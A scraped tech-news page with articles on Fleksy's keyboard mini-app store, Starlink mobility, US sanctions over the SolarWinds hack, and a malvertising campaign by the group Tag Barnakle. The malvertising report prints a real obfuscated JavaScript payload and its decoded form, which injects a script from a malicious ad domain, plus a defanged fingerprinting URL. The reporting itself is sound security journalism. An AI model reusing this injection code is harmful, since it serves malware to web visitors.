Connect with us

Biz & IT

Fleksy’s AI keyboard is getting a store to put mini apps at chatters’ fingertips

Published

on

Remember Fleksy? The customizable Android keyboard app has a new trick up its sleeve: It’s adding a store where users can find and add lightweight third party apps to enhance their typing experience.

Right now it’s launched a taster, preloading a selection of ‘mini apps’ into the keyboard — some from very familiar brand names, some a little less so — so users can start to see how it works.

The first in-keyboard apps are Yelp (local services search); Skyscanner (flight search); Giphy (animated Gif search); GifNote (music Gifs; launching for U.S. users only for rights reasons); Vlipsy (reaction video clips); and Emogi (stickers) — with “many more” branded apps slated as coming in the next few months.

They’re not saying exactly what other brands are coming but there are plenty of familiar logos to be spotted in their press materials — from Spotify to Uber to JustEat to Tripadvisor to PayPal and more…

The full keyboard store itself — which will let users find and add and/or delete apps — will be launching at the end of this month.

The latest version of the Fleksy app can be downloaded for free via the Play Store.

Mini apps made for messaging

The core idea for these mini apps (aka Fleksyapps) is to offer lightweight additions designed to serve the messaging use case.

Say, for example, you’re chatting about where to eat and a friend suggests sushi. The Yelp Fleksyapp might pop up a contextual suggestion for a nearby Japanese restaurant that can be shared directly into the conversation — thereby saving time by doing away with the need for someone to cut out of the chat, switch apps, find some relevant info and cut and paste it back into the chat.

Fleksyapps are intended to be helpful shortcuts that keep the conversation flowing. They also of course put brands back into the conversation.

“We couldn’t be more excited to bring the power of the world’s popular songs with GIFs, videos and photos to the new Fleksyapps platform,” says Gifnote co-founder, John vanSuchtelen, in a supporting statement.

Fleksy’s mini apps appear above the Qwerty keyboard — in much the same space as a next-word prediction. The user can scroll through the app stack (each a tiny branded circle until tapped on to expand) and choose one to interact with. It’s similar to the micro apps lodged in Apple’s iMessage but on Android where iMessage isn’t… The team also plans for Fleksy to support a much wider range of branded apps — hence the Fleksyapps store.

In-keyboard apps is not a new concept for the dev team behind Fleksy; an earlier keyboard app of theirs (called ThingThing) offered micro apps they built themselves as a tool to extend its utility.

But now they’re hoping to garner backing and buy in from third party brands excited about the exposure and reach they could gain by being where users spend the most device time: The keyboard.

“Think of it a bit like the iMessage equivalent but on Android across any app. Or the WeChat mini program but inside the keyboard, available everywhere — not only in one app,” CEO Olivier Plante tells TechCrunch. “That’s a problem of messaging apps these days. All of them are verticals but the keyboard is horizontal. So that’s the benefit for those brands. And the user will have the ability to move them around, add some, to remove some, to explore, to discover.”

“The brands that want to join our platform they have the option of being preloaded by default. The analogy is that by default on the home screen of a phone you are by default in our keyboard. And moving forward you’ll be able to have a membership — you’re becoming a ‘brand member’ of the Fleksyapps platform, and you can have your brand inside the keyboard,” he adds.

The first clutch of Fleksyapps were developed jointly, with the team working with the brands in question. But Plante says they’re planning to launch a tool in future so brands will be able to put together their own apps — in as little as just a few hours.

“We’re opening this array of functionalities and there’s a lot of verticals possible,” he continues. “In the future months we will embed new capabilities for the platform — new type of apps. You can think about professional apps, or cloud apps. Accessing your files from different types of clouds. You have the weather vertical. You have ecommerce vertical. You have so many verticals.

“What you have on the app store today will be reflected into the Fleksyappstore. But really with the focus of messaging and being useful in messaging. So it’s not the full app that we want to bring in — it’s really the core functionality of this app.”

The Yelp Fleksyapp, for example, only includes the ability to see nearby places and search for and share places. So it’s intentionally stripped down. “The core benefit for the brand is it gives them the ability to extend their reach,” says Plante. “We don’t want to compete with the app, per se, we just want to bring these types of app providers inside the messenger on Android across any app.”

On the user side, the main advantage he touts is “it’s really, really fast — fleshing that out to: “It’s very lightweight, it’s very, very fast and we want to become the fastest access to content across any app.”

Users of Fleksyapps don’t need to have the full app installed because the keyboard plugs directly into the API of each branded service. So they get core functionality in bite-sized form without a requirement to download the full app. (Of course they can if they wish.)

So Plante also notes the approach has benefits vis-a-vis data consumption — which could be an advantage in emerging markets where smartphone users’ choices may be hard-ruled by the costs of data and/or connectivity limits.

“For those types of users it gives them an ability to access content but in a very light way — where the app itself, loading the app, loading all the content inside the app can be megabits. In Fleksy you’re talking about kilobits,” he says.

Privacy-sensitive next app suggestions

While baking a bunch of third party apps into a keyboard might sound like a privacy nightmare, the dev team behind Fleksy have been careful to make sure users remain in control.

To wit: Also on board is an AI keyboard assistant (called Fleksynext) — aka “a neural deep learning engine” — which Plante says can detect the context, intention and sentiment of conversations in order to offer “very useful” app suggestions as the chat flows.

The idea is the AI supports the substance of the chat by offering useful functionality from whatever pick and mix of apps are available. Plante refers to these AI-powered ‘next app’ suggestions as “pops”.

And — crucially, from a privacy point of view — the Fleksynext suggestion engine operates locally, on device.

That means no conversation data is sent out of the keyboard. Indeed, Plante says nothing the user types in the keyboard itself is shared with brands (including suggestions that pop up but get ignored). So there’s no risk — as with some other keyboard apps — of users being continually strip-mined for personal data to profile them as they type.

That said, if the user chooses to interact with a Fleksyapp (or its suggestive pop) they are then interacting with a third party’s API. So the usual tracking caveats apply.

“We interact with the web so there’s tracking everywhere,” admits Plante. “But, per se, there’s not specific sensitive data that is shared suddenly with someone. It is not related with the service itself — with the Fleksy app.”

The key point is that the keyboard user gets to choose which apps they want to use and which they don’t. So they can choose which third parties they want to share their plans and intentions with and which they don’t.

“We’re not interesting in making this an advertising platform where the advertiser decides everything,” emphasizes Plante. “We want this to be really close to the user. So the user decides. My intentions. My sentiment. What I type decides. And that is really our goal. The user is able to power it. He can tap on the suggestion or ignore it. And then if he taps on it it’s a very good quality conversion because the user really wants to access restaurants nearby or explore flights for escaping his daily routine… or transfer money. That could be another use-case for instance.”

They won’t be selling brands a guaranteed number of conversions, either.

That’s clearly very important because — to win over users — Fleksynext suggestions will need to feel telepathically useful, rather than irritating, misfired nag. Though the risk of that seems low given how Fleksy users can customize the keyboard apps to only see stuff that’s useful to them.

“In a sense we’re starting reshape a bit how advertising is seen by putting the user in the center,” suggests Plante. “And giving them a useful means of accessing content. This is the original vision and we’ve been very loyal to that — and we think it can reshape the landscape.”

“When you look into five years from now, the smartphone we have will be really, really powerful — so why process things in the cloud? When you can process things on the phone. That’s what we are betting on: Processing everything on the phone,” he adds.

When the full store launches users will be able to add and delete (any) apps — included preloads. So they will be in the driving seat. (We asked Plante to a confirm the user will be able to delete all apps, including any pre-loadeds and he said yes. So if you take him at his word Fleksy will not be cutting any deals with OEMs or carriers to indelibly preload certain Fleksyapps. Or, to put it another way, crapware baked into the keyboard is most definitely not plan.)

Depending on what other Fleksyapps launch in future a Fleksy keyboard user could choose to add, for example, a search service like DuckDuckGo or France’s Qwant to power a pro-privacy alternative to using Google search in the keyboard. Or they could choose Google.

Again the point is the choice is theirs.

Scaling a keyboard into a platform

The idea of keyboard-as-platform offers at least the possibility of reintroducing the choice and variety of smartphone app stores back before the cynical tricks of attention-harvesting tech giants used their network effects and platform power to throttle the app economy.

The Android keyboard space was also a fertile experiment ground in years past. But it’s now dominated by Google’s Gboard and Microsoft-acquired Swiftkey. Which makes Fleksy the plucky upstart gunning to scale an independent alternative that’s not owned by big tech and is open to any third party that wants to join its mini apps party.

“It will be Bing search for Swiftkey, it will be Google search for Gboard, it will be Google Music, it will be YouTube. But on our side we can have YouTube, we can also have… other services that exist for video. The same way with pictures and the same way for file-sharing and drive. So you have Google Drive but you have Dropbox, you have OneDrive, there’s a lot of services in the cloud. And we want to be the platform that has them all, basically,” says Plante.

The original founding team of the Fleksy keyboard was acqui-hired by Pinterest back in 2016, leaving the keyboard app itself to languish with minimal updates. Then two years ago Barcelona-based keyboard app maker, ThingThing, stepped in to take over development.

Plante confirms it’s since fully acquired the Fleksy keyboard technology itself — providing a solid foundation for the keyboard-as-platform business it’s now hoping to scale with the launch of Fleksyapps.

Talking of scale, he tells us the startup is in the process of raising a multi-million Series A — aiming to close this summer. (ThingThing last took in $800,000 via equity crowdfunding last fall.)

The team’s investor pitch is the keyboard offers perhaps the only viable conduit left on mobile to reset the playing field for brands by offering a route to cut through tech giant walled gardens and get where users are spending most of their time and attention: i.e. typing and sharing stuff with their friends in private one-to-one and group chats.

That means the keyboard-as-platform has the potential to get brands of all stripes back in front of users — by embedding innovative, entertaining and helpful bite-sized utility where it can prove its worth and amass social currency on the dominant messaging platforms people use.

The next step for the rebooted Fleksy team is of course building scale by acquiring users for a keyboard which, as of half a year ago, only had around 1M active users from pure downloads.

Its strategy on this front is to target Android device makers to preload Fleksy as the default keyboard.

ThingThing’s business model is a revenue share on any suggestions the keyboard converts, which it argues represent valuable leads for brands — given the level of contextual intention. It is also intending to charge brands that want to be preloaded on the Fleksy keyboard by default.

Again, though, a revenue share model requires substantial scale to work. Not least because brands will need to see evidence of scale to buy into the Fleksyapps’ vision.

Plante isn’t disclosing active users of the Fleksy keyboard right now. But says he’s confident they’re on track to hit 30M-35M active users this year — on account of around ten deals he says are in the pipeline with device makers to preload Fleksy’s keyboard. (Palm was an early example, as we reported last year.)

The carrot for OEMs to join the Fleksyapps party is they’re cutting them in on the revenue share from user interactions with branded keyboard apps — playing to device makers’ needs to find ways to boost famously tight hardware margins.

“The fact that the keyboard can monetize and provide value to the phone brands — this is really massive for them,” argues Plante. “The phone brands can expect revenue flowing in their bank account because we give the brands distribution and the handset manufacturer will make money and we will make money.”

It’s a smart approach, and one that’s essentially only possible because Google’s own Gboard keyboard doesn’t come preloaded on the majority of Android devices. (Exceptions include its own Pixel brand devices.) So — unusually for a core phone app on Android — there’s a bit of an open door where the keyboard sits, instead of the usual preloaded Google wares. And that’s an opportunity.

Markets wise, ThingThing is targeting OEMs in all global regions with its Fleksy pitch — barring China (which Plante readily admits it too complex for a small startup to sensibly try jumping at).

Apps vs tech giants

In its stamping ground of Europe there are warm regulatory winds blowing too: An European Commission antitrust intervention last year saw Google hit with a $5BN fine over anti-competitive practices attached to its Android platform — forcing the company to change local licensing terms.

That antirust decision means mobile makers finally have the chance to unbundle Google apps from devices they sell in the region.

Which translates into growing opportunities for OEMs to rethink their Android strategies. Even as Google remains under pressure not to get in the way by force feeding any more of its wares.

Really, a key component of this shift is that device makers are being told to think, to look around and see what else is out there. For the first time there looks to be a viable chance to profit off of Android without having to preload everything Google wants.

“For us it’s a super good sign,” says Plante of the Commission decision. “Every monopolistic situation is a problem. And the market needs to be fragmented. Because if not we’re just going to lose innovation. And right now Europe — and I see good progress for the US as well — are trying to dismantle the imposed power of those big guys. For the simple evolution of human being and technology and the future of us.”

“I think good things can happen,” he adds. “We’re in talks with handset manufacturers who are coming into Europe and they want to be the most respectful of the market. And with us they have this reassurance that you have a good partner that ensures there’s a revenue stream, there’s a business model behind it, there’s really a strong use-case for users.

“We can finally be where we always wanted to be: A choice, an alternative. But having Google imposing its way since start — and making sure that all the direct competition of Google is just a side, I think governments have now seen the problem. And we’re a winner of course because we’re a keyboard.”

But what about iOS? Plante says the team has plans to bring what they’re building with Fleksy to Apple’s mobile platform too, in time. But for now they’re fully focusing efforts on Android — to push for scale and execute on their vision of staking their claim to be the independent keyboard platform.

Apple has supported third party keyboards on iOS for years. Unfortunately, though, the experience isn’t great — with a flaky toggle to switch away from the default Apple keyboard, combined with heavy system warnings about the risks of using third party keyboards.

Meanwhile the default iOS keyboard ‘just works’ — and users have loads of extra features baked by default into Apple’s native messaging app, iMessage.

Clearly alternative keyboards have found it all but impossible to build any kind of scale in that iOS pincer.

“iOS is coming later because we need to focus on these distribution deals and we need to focus on the brands coming into the platform. And that’s why iOS right now we’re really focusing for later. What we can say is it will come later,” says Plante, adding: “Apple limits a lot keyboards. You can see it with other keyboard companies. It’s the same. The update cycle for iOS keyboard is really, really, really slow.”

Plus, of course, Fleksy being preloaded as a default keyboard on — the team hopes — millions of Android devices is a much more scalable proposition vs just being another downloadable app languishing invisibly on the side lines of another tech giant’s platform.

Source link

Source link

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Biz & IT

Millions of web surfers are being targeted by a single malvertising group

Published

on

Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious advertisements on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all outward appearances, are benign.

Malvertising is the practice of delivering ads to people as they visit trusted websites. The ads embed JavaScript that surreptitiously exploits software flaws or tries to trick visitors into installing an unsafe app, paying fraudulent computer support fees, or taking other harmful actions. Typically, the scammers behind this Internet scourge pose as buyers and pay ad-delivery networks to display the malicious ads on individual sites.

Going for the jugular

Infiltrating the ad ecosystem by posing as a legitimate buyer requires resources. For one, scammers must invest time learning how the market works and then creating an entity that has a trustworthy reputation. The approach also requires paying money to buy space for the malicious ads to run. That’s not the technique used by a malvertising group that security firm Confiant calls Tag Barnakle.

“Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular—mass compromise of ad serving infrastructure,” Confiant researcher Eliya Stein wrote in a blog post published Monday. “Likely, they’re also able to boast an ROI [return on investment] that would eclipse their rivals as they don’t need to spend a dime to run ad campaigns.”

Over the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for organizations that want to run their own ad server rather than relying on a third-party service. The 120 figure is twice the number of infected Revive servers Confiant found last year.

Once it has compromised an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses client-side fingerprinting to ensure only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques to ensure that they also fly under the radar.

Here’s an overview:

Confiant

When Confiant reported last year on Tag Barnakle, it found the group had infected about 60 Revive servers. The feat allowed the group to distribute ads on more than 360 Web properties. The ads pushed fake Adobe Flash updates that, when run, installed malware on desktop computers.

This time, Tag Barnakle is targeting both iPhone and Android users. Websites that receive an ad through a compromised server deliver highly obfuscated JavaScript that determines if a visitor is using an iPhone or Android device.

https://galikos[.]com/ci.html?mAn8iynQtt=SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

In the event that visitors pass that and other fingerprinting tests, they receive a secondary payload that looks like this:


var _0x209b=["charCodeAt","fromCharCode","atob","length"];(function(_0x58f22e,_0x209b77){var _0x3a54d6=function(_0x562d16){while(--_0x562d16){_0x58f22e["push"](_0x58f22e["shift"]());}};_0x3a54d6(++_0x209b77);}(_0x209b,0x1d9));var _0x3a54=function(_0x58f22e,_0x209b77){_0x58f22e=_0x58f22e-0x0;var _0x3a54d6=_0x209b[_0x58f22e];return _0x3a54d6;};function pr7IbU3HZp6(_0x2df7f1,_0x4ed28f){var _0x40b1c0=[],_0xfa98e6=0x0,_0x1d2d3f,_0x4daddb="";for(var _0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0x40b1c0[_0xaefdd9]=_0xaefdd9;}for(_0xaefdd9=0x0;_0xaefdd9<0x100;_0xaefdd9++){_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9]+_0x4ed28f["charCodeAt"](_0xaefdd9%_0x4ed28f[_0x3a54("0x2")]))%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f;}_0xaefdd9=0x0,_0xfa98e6=0x0;for(var _0x2bdf25=0x0;_0x2bdf25<_0x2df7f1[_0x3a54("0x2")];_0x2bdf25++){_0xaefdd9=(_0xaefdd9+0x1)%0x100,_0xfa98e6=(_0xfa98e6+_0x40b1c0[_0xaefdd9])%0x100,_0x1d2d3f=_0x40b1c0[_0xaefdd9],_0x40b1c0[_0xaefdd9]=_0x40b1c0[_0xfa98e6],_0x40b1c0[_0xfa98e6]=_0x1d2d3f,_0x4daddb+=String[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25)^_0x40b1c0[(_0x40b1c0[_0xaefdd9]+_0x40b1c0[_0xfa98e6])%0x100]);}return _0x4daddb;}function fCp5tRneHK(_0x2deb18){var _0x3d61b2="";try{_0x3d61b2=window[_0x3a54("0x1")](_0x2deb18);}catch(_0x4b0a86){}return _0x3d61b2;};var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"];var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[3]), qIxFjKSY6BVD[5]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[7]), qIxFjKSY6BVD[8]));aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[0]), qIxFjKSY6BVD[2]));var bundle = document.body||document.documentElement;bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

When decoded, the payload is:

var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");

As the de-obfuscated code shows, the ads are served through overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an ad network that security firms including Malwarebytes have long documented as malicious.

When Confiant researchers replayed the Propeller Ads click tracker on the types of devices Tag Barnakle was targeting, they saw ads like these:

Confiant

Tens of millions served

The ads mostly lure targets to an app store listing for fake security, safety, or VPN apps with hidden subscription costs or “siphon off traffic for nefarious ends.”

With ad servers frequently integrated with multiple ad exchanges, the ads have the potential to spread widely through hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the malvertising but the firm believes the number is high.

“If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens if not hundreds of millions of devices,” Stein wrote. “This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence.”

Continue Reading

Biz & IT

Dishy McFlatface to become “fully mobile,” allowing Starlink use away from home

Published

on

Enlarge / A Starlink satellite dish in the Idaho panhandle’s Coeur d’Alene National Forest.

SpaceX CEO Elon Musk expects the Starlink satellite broadband service to be “fully mobile” later in 2021, allowing customers to use the satellite dishes away from home.

“Yeah, should be fully mobile later this year, so you can move it anywhere or use it on an RV or truck in motion. We need a few more satellite launches to achieve comp[l]ete coverage & some key software upgrades,” Musk wrote on Twitter Thursday.

SpaceX revealed a portion of its mobile plans last month when it asked the Federal Communications Commission for permission to deploy a modified version of its user terminal to moving vehicles. But while that application is for a not-yet-released version of the terminal with “mountings that allow them to be installed on vehicles, vessels, and aircraft,” Musk’s comment about Starlink being “fully mobile” later this year was in reference to the standard terminal that’s been deployed to beta customers the past few months.

Musk was replying to a person who asked, “Will users always be locked into one location or in the future if a user has the standard Dishy McFlatface (not a new portable one), could you say put it on an RV or tiny home? Or maybe take one you have in Iowa and put it in a studio in Texas[?]” Musk’s affirmative reply suggests that Starlink coverage will be widespread enough later this year for users to take Dishy McFlatface just about anywhere and get Internet service.

The Starlink terms of service say the terminal is “for use exclusively at the address you provided in your Order,” but some users have traveled with their terminals and gotten service elsewhere. Musk wrote in another tweet Thursday that Starlink “uptime, bandwidth & latency are improving rapidly,” and that the service will probably exit beta this summer.

Coverage for “most of Earth” this year

Starlink has been advertising beta-service speeds of 50Mbps to 150Mbps, with latency of 20 ms to 40 ms. Musk said in February that speeds will hit 300Mbps later this year and that the service will become available to “most of Earth” by the end of 2021. SpaceX has launched 1,445 broadband satellites into low-Earth orbits, according to statistics maintained by astrophysicist Jonathan McDowell. SpaceX has 1,351 working satellites in orbit after accounting for ones that have been de-orbited, are not maneuvering, or re-entered the atmosphere after failure. SpaceX has an FCC license to launch nearly 12,000 satellites and has asked for permission to launch an additional 30,000.

SpaceX has been accepting preorders for Starlink service to be available in the second half of this year but slots are limited in each region. Those limits should help prevent the capacity problems that would arise if Starlink is deployed too widely in any given region, and this will make it more likely that users can travel with their “fully mobile” dishes and still get service.

SpaceX is charging $99 a month for Starlink plus $499 up front for equipment, and the company says it will keep pricing simple and transparent after exiting beta, which will happen when “the network is reliable.” SpaceX has an FCC license to deploy up to 1 million user terminals in the US and has asked the FCC for authority to deploy up to 5 million.

Starlink faces continued opposition

While Starlink is generating excitement among users because it can provide modern broadband speeds to regions ignored by large Internet providers, the SpaceX project has also faced a steady drumbeat of opposition. A Wall Street Journal article today stated that “Elon Musk’s Internet satellite venture has spawned an unlikely alliance of competitors, regulators and experts who say the billionaire is building a near-monopoly that is threatening space safety and the environment.” Other satellite companies “complain that Mr. Musk’s satellites are blocking their own devices’ signals and have physically endangered their fleets,” the article said.

“It’s a race to the bottom in terms of getting as much stuff up there as possible to claim orbital real estate,” said Professor Moriba Jah of the Department of Aerospace Engineering and Engineering Mechanics at the University of Texas, according to the Journal. “Musk is just doing what’s legal… but legal is not necessarily safe or sustainable.”

As we’ve reported in previous coverage, Dish Network and Amazon have been fighting SpaceX’s satellite plans. (Amazon is planning a rival constellation.) Internet service providers that object to SpaceX being awarded rural-broadband funding have urged the FCC to direct that funding elsewhere. Meanwhile, astronomers are worried about Starlink and other large satellite constellations harming their ability to observe the night sky.

Continue Reading

Biz & IT

US government strikes back at Kremlin for SolarWinds hack campaign

Published

on

Matt Anderson Photography/Getty Images

US officials on Thursday formally blamed Russia for backing one of the worst espionage hacks in recent US history and imposed sanctions designed to mete out punishments for that and other recent actions.

In a joint advisory, the National Security Agency, FBI, and Cybersecurity and Information Security Agency said that Russia’s Foreign Intelligence Service, abbreviated as the SVR, carried out the supply-chain attack on customers of the network management software from Austin, Texas-based SolarWinds.

The operation infected SolarWinds’ software build and distribution system and used it to push backdoored updates to about 18,000 customers. The hackers then sent follow-up payloads to about 10 US federal agencies and about 100 private organizations. Besides the SolarWinds supply-chain attack, the hackers also used password guessing and other techniques to breach networks.

After the massive operation came to light, Microsoft President Brad Smith called it an “act of recklessness.” In a call with reporters on Thursday, NSA Director of Cybersecurity Rob Joyce echoed the assessment that the operation went beyond established norms for government spying.

“We observed absolutely espionage,” Joyce said. “But what is concerning is from that platform, from the broad scale of availability of the access they achieved, there’s the opportunity to do other things, and that’s something we can’t tolerate and that’s why the US government is imposing costs and pushing back on these activities.”

Thursday’s joint advisory said that the SVR-backed hackers are behind other recent campaigns targeting COVID-19 research facilities, both by infecting them with malware known as both WellMess and WellMail and by exploiting a critical vulnerability in VMware software.

The advisory went on to say that the Russian intelligence service is continuing its campaign, in part by targeting networks that have yet to patch one of the five following critical vulnerabilities. Including the VMware flaw, they are:

  • CVE-2018-13379 Fortinet FortiGate VPN
  • CVE-2019-9670 Synacor Zimbra Collaboration Suite
  • CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN
  • CVE-2019-19781 Citrix Application Delivery Controller and Gateway
  • CVE-2020-4006 VMware Workspace ONE Access

“Mitigation against these vulnerabilities is critically important as US and allied networks are constantly scanned, targeted, and exploited by Russian state-sponsored cyber actors,” the advisory stated. It went on to say that the “NSA, CISA, and FBI strongly encourage all cybersecurity stakeholders to check their networks for indicators of compromise related to all five vulnerabilities and the techniques detailed in the advisory and to urgently implement associated mitigations.”

CISA

The US Treasury Department, meanwhile, imposed sanctions to retaliate for what it said were “aggressive and harmful activities by the Government of the Russian Federation.” The measures include new prohibitions on Russian sovereign debt and sanctions on six Russia-based firms that the Treasury Department said “supported the Russian Intelligence Services’ efforts to carry out malicious cyber activities against the United States.”

The firms are:

  • ERA Technopolis, a research center operated by the Russian Ministry of Defense for transferring the personnel and expertise of the Russian technology sector to the development of technologies used by the country’s military. ERA Technopolis supports Russia’s Main Intelligence Directorate (GRU), a body responsible for offensive cyber and information operations.
  • Pasit, a Russia-based information technology company that has conducted research and development supporting malicious cyber operations by the SVR.
  • SVA, a Russian state-owned research institute specializing in advanced systems for information security located in that country. SVA has done research and development in support of the SVR’s malicious cyber operations.
  • Neobit, a Saint Petersburg, Russia-based IT security firm whose clients include the Russian Ministry of Defense, SVR, and Russia’s Federal Security Service. Neobit conducted research and development in support of the cyber operations conducted by the FSB, GRU, and SVR.
  • AST, a Russian IT security firm whose clients include the Russian Ministry of Defense, SVR, and FSB. AST provided technical support to cyber operations conducted by the FSB, GRU, and SVR.
  • Positive Technologies, a Russian IT security firm that supports Russian Government clients, including the FSB. Positive Technologies provides computer network security solutions to Russian businesses, foreign governments, and international companies and hosts recruiting events for the FSB and GRU.

“The reason they were called out is because they’re an integral part and participant in the operation that the SVR executes,” Joyce said of the six companies. “Our hope is that by denying the SVR the support of those companies, we’re impacting their ability to project some of this malicious activity around the world and especially into the US.”

Russian government officials have steadfastly denied any involvement in the SolarWinds campaign.

Besides attributing the SolarWinds campaign to the Russian government, Thursday’s release from the Treasury Department also said that the SVR was behind the August 2020 poisoning of Russian opposition leader Aleksey Navalny with a chemical weapon, the targeting of Russian journalists and others who openly criticize the Kremlin, and the theft of “red team tools,” which use exploits and other attack tools to mimic cyber attacks.

The “red team tools” reference was likely related to the offensive tools taken from FireEye, the security firm that first identified the Solar Winds campaign after discovering its network had been breached.
The Treasury department went on to say that the Russian government “cultivates and co-opts criminal hackers” to target US organizations. One group, known as Evil Corp. was sanctioned in 2019. That same year, federal prosecutors indicted the Evil Corp kingpin Maksim V. Yakubets and posted a $5 million bounty for information that leads to his arrest or conviction.

Although overshadowed by the sanctions and the formal attribution to Russia, the most important takeaway from Thursday’s announcements is that the SVR campaign remains ongoing and is currently leveraging the exploits mentioned above. Researchers said on Thursday that they’re seeing Internet scanning that is intended to identify servers that have yet to patch the Fortinet vulnerability, which the company fixed in 2019. Scanning for the other vulnerabilities is also likely ongoing.

People managing networks, particularly any that have yet to patch one of the five vulnerabilities, should read the latest CISA alert, which provides extensive technical details about the ongoing hacking campaign and ways to detect and mitigate compromises.

Continue Reading

Trending